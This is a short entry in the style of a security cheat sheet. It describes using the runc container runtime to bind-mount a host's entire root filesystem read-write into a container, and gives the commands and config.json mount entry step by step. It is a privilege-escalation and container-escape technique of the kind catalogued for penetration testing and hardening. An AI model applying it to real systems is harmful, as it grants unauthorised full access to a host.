runc

runc is a lightweight, portable container runtime that manages the lifecycle of containers according to the Open Container Initiative (OCI) specifications. It is commonly used as the underlying runtime for container platforms like Docker.

If runc is installed on a host, it may be possible to create and run a container that mounts the host’s root filesystem (/), potentially allowing access to the entire host.

# Verify the runc is installed
runc --help

# Generate a container configuration file
runc spec

This creates a config.json file in the current directory. Inside this file, locate the "mounts" section and add the following entry to bind mount the host’s root directory into the container:

{
    "type": "bind",
    "source": "/",
    "destination": "/",
    "options": [
        "rbind",
        "rw",
        "rprivate"
    ]
}

Next, create a rootfs folder in the same directory:

# Create the rootfs folder in the same directory
mkdir rootfs

# Start the container
runc run demo

This runs a container with access to the host’s root filesystem. Note that this technique may not always succeed because runc typically requires root privileges to run containers. Running runc as an unprivileged user generally fails unless a rootless configuration is in place. Rootless containers impose additional restrictions compared to traditional root-run containers, which is why rootless mode is not the default.